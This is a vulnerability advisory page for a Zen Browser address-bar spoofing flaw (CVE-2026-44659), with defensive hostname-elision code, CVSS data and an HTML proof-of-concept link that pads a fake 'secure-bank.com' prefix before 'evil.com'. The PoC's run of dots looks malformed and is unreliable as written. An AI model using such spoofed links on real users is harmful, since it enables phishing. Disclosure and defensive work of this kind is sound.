Security Vulnerability Report
CVE-2026-44659 CVSS 4.7 MEDIUM

CVE-2026-44659

Published: 2026-05-11 18:16:38
Last Modified: 2026-05-11 18:16:38

Description

Zen is a Firefox-based browser. Prior to 1.19.12b, Zen Browser incorrectly truncates long hostnames in the address bar and shows only the attacker-controlled prefix of the subdomain, hiding the actual registrable domain (eTLD+1). As a result, an attacker can craft extremely long malicious subdomains that visually imitate trusted brands, and the browser will display only the spoofed prefix, misleading users about the actual origin of the site. This directly compromises the URL bar as a security indicator and creates a phishing/supply-chain attack vector. This vulnerability is fixed in 1.19.12b.
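The defect is in how the hostname is elided, not in URL parsing: cutting a long hostname from the right keeps the leading labels, which are the part the site owner controls, and drops the registrable domain, which is the part that identifies the origin. The following is an added example (not code from the advisory, from NVD, or from the Zen project) that contrasts a right-truncating display with one that always keeps the eTLD+1 visible and elides the leading subdomain labels instead. The public-suffix table is a constructed stand-in for the real Public Suffix List that a browser would consult; the function names are this example's own.

```javascript
// Added example: safe elision of a long hostname for an address bar.
// PUBLIC_SUFFIXES is a constructed stand-in for the Public Suffix List.
const PUBLIC_SUFFIXES = new Set(["com", "org", "net", "uk", "co.uk", "github.io"]);

// Return the registrable domain (eTLD+1): the longest matching public suffix
// plus one more label. Returns null when no label precedes a known suffix
// (e.g. "localhost" or a bare suffix).
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().replace(/\.$/, "").split(".");
  // Walking from the left finds the longest suffix first ("co.uk" before "uk").
  for (let i = 0; i < labels.length - 1; i++) {
    const suffix = labels.slice(i + 1).join(".");
    if (PUBLIC_SUFFIXES.has(suffix)) {
      return labels.slice(i).join(".");
    }
  }
  return null;
}

// The flawed behaviour described in the advisory: truncate from the right,
// so only the attacker-chosen prefix (e.g. "www.secure-bank.com") survives.
function elideKeepPrefix(hostname, maxLen) {
  if (hostname.length <= maxLen) return hostname;
  return hostname.slice(0, maxLen - 1) + "…";
}

// The corrected behaviour: reserve space for the registrable domain and spend
// whatever is left on the leading labels, eliding in the middle.
function elideKeepRegistrable(hostname, maxLen) {
  if (hostname.length <= maxLen) return hostname;
  const reg = registrableDomain(hostname) || hostname;
  const budget = maxLen - reg.length - 1; // one slot for the ellipsis
  if (budget <= 0) return "…" + reg;      // nothing else fits; origin still shown
  const prefix = hostname.slice(0, hostname.length - reg.length); // ends in "."
  return prefix.slice(0, budget) + "…" + reg;
}

// Invariant a display test can assert: whatever string is rendered must end
// with the real registrable domain of the URL's host.
function showsRegistrable(displayed, hostname) {
  const reg = registrableDomain(hostname);
  return reg !== null && displayed.endsWith(reg);
}

// Constructed sample: a brand-like prefix, a very long label, then the real origin.
const SAMPLE_HOST = "www.secure-bank.com." + "x".repeat(300) + ".evil.com";
console.log(elideKeepPrefix(SAMPLE_HOST, 20));       // hides the origin
console.log(elideKeepRegistrable(SAMPLE_HOST, 20));  // keeps "evil.com" visible
```

The invariant checked by `showsRegistrable` is the one a browser's address-bar tests should enforce for every truncation width: if the rendered string can end in anything other than the eTLD+1, the URL bar has stopped being a trustworthy origin indicator, which is exactly the CWE-451 condition this advisory records.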

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)


Zen Browser < 1.19.12b

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- PoC demonstration of the hostname truncation vulnerability -->
<!-- This HTML file creates a link to a simulated malicious domain -->
<!DOCTYPE html>
<html>
<head>
  <title>Zen Browser Hostname Truncation PoC</title>
</head>
<body>
  <h1>Zen Browser CVE-2026-44659 PoC</h1>
  <p>This page demonstrates how a long hostname can be truncated in the address bar.</p>
  <!-- The link below uses a long subdomain to push the real domain out of view.
       Replace 'evil.com' with an actual domain for testing. -->
  <a href="http://www.secure-bank.com................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................evil.com">
    Click here to visit the spoofed bank site
  </a>
  <p>In a vulnerable version of Zen Browser (&lt; 1.19.12b), the address bar will show only 'www.secure-bank.com', hiding the actual origin.</p>
</body>
</html>

References

https://github.com/zen-browser/desktop/security/advisories/GHSA-7p2r-fp29-9w69

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44659", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:38.380", "lastModified": "2026-05-11T18:16:38.380", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zen is a firefox-based browser. Prior to 1.19.12b, the ZEN Browser incorrectly truncates long hostnames in the address bar and shows only the attacker-controlled prefix of the subdomain, hiding the actual registrable domain (eTLD+1). As a result, an attacker can craft extremely long malicious subdomains that visually imitate trusted brands, and the browser will display only the spoofed prefix, misleading users about the actual origin of the site. This directly compromises the URL bar as a security indicator and creates a phishing/supply-chain attack vector. This vulnerability is fixed in 1.19.12b."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "references": [{"url": "https://github.com/zen-browser/desktop/security/advisories/GHSA-7p2r-fp29-9w69", "source": "[email protected]"}]}}